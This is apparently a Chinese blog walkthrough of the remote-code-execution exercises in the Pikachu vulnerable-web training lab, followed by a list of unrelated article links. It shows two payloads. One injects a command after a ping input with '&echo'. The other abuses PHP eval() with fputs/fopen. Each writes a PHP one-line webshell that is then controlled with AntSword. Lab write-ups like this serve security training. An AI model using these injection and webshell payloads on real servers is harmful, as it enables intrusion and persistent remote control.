Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
巾帼前端30 分钟前
全自动化知识库整理第一步
运维·自动化
麻瓜呀1 小时前
vue2 Element-ui框架相关常见问题-表单组件重置显示异常
运维·服务器·ui
wanhengidc1 小时前
算力服务器的作用都有哪些?
运维·服务器·深度学习
电商API_180079052471 小时前
京东商品评论API接口封装的心路历程
服务器·开发语言·爬虫·数据分析·php
TG_yunshuguoji1 小时前
亚马逊云代理商:如何监控AWS RDS使用率并设置报警?
运维·云计算·aws
benjiangliu1 小时前
LINUX系统-12-进程控制(三)-自定义shell
linux·运维·服务器
lzhailb1 小时前
nginx
运维·nginx
The Open Group2 小时前
开放流程自动化™标准:不是“更好的控制系统”,而是一次工业自动化协作方式的重构
运维·重构·自动化
The️2 小时前
Linux驱动开发之Open_Close函数
linux·运维·驱动开发·mcu·ubuntu
my_styles2 小时前
window系统安装/配置Nginx
服务器·前端·spring boot·nginx